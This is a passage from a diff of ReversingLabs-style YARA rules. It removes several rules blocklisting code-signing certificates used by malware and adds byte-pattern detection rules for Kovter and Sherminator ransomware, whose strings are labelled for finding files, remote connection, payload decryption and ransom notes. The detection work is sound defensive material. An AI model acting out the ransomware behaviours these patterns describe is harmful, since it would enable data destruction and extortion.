9A 28 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D + 2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A + } + $find_files_p2 = { + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? + ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18 + 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25 + 1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E + 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? + A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ?? + ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? + 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? + A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A + } + $drop_ransom_note = { + 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? + ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E + ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? + ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Grina LLC" and pe.signatures[i].serial=="77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Kovter ransomware." author = "ReversingLabs" - id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a" - date = "2023-11-08" - modified = "2023-11-08" + id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5250-L5268" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Kovter" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and (pe.signatures[i].serial=="00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures[i].serial=="e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f") and 1570838400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "42aa3105-a077-5962-8d5d-50429254582b" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5270-L5288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HMWOCFPSDLAFMFZIVD" and (pe.signatures[i].serial=="cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures[i].serial=="30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4") and 1601918720<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "21d54d40-442e-50f5-a561-41b3d6239bac" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5290-L5308" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Instamix Limited" and (pe.signatures[i].serial=="00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures[i].serial=="a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5") and 1598054400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5310-L5326" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KLAKSON, LLC" and pe.signatures[i].serial=="0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "f68338f9-8614-5793-981d-70547dbc65ce" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5328-L5344" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 - - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Korist Networks Incorporated" and pe.signatures[i].serial=="36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5346-L5364" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $remote_connection_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D + ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + 89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74 + ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 + 89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? + ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? + 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D + 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? + 8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D + } + $remote_connection_2 = { + 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ?? + ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A + ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 + ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? + ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? + 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF + 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D + 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 + ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 + E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? + ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B + 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? + ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 + 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B + } + $remote_connection_3 = { + 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? + ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? + E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? + 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 + ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? + ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? + ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 + ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $find_files = { + 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 + ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ?? + ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ?? + 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 + ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 + FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? + ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 + ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F + 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F + 84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 + ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 + ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 + ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 + F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB + 75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $decrypt_payload_script = { + FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF + 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 + ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? + ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF + 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF + 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? + ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D + 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LEX CORPORATION PTY LTD" and (pe.signatures[i].serial=="00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures[i].serial=="ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07") and 1571011200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_files and $decrypt_payload_script and ( all of ($remote_connection_*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sherminator ransomware." author = "ReversingLabs" - id = "5aed508e-2da1-52a0-98f3-52e903e95b7d" - date = "2023-11-08" - modified = "2023-11-08" + id = "99792a22-8027-557f-927f-30eac4d1e690" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = 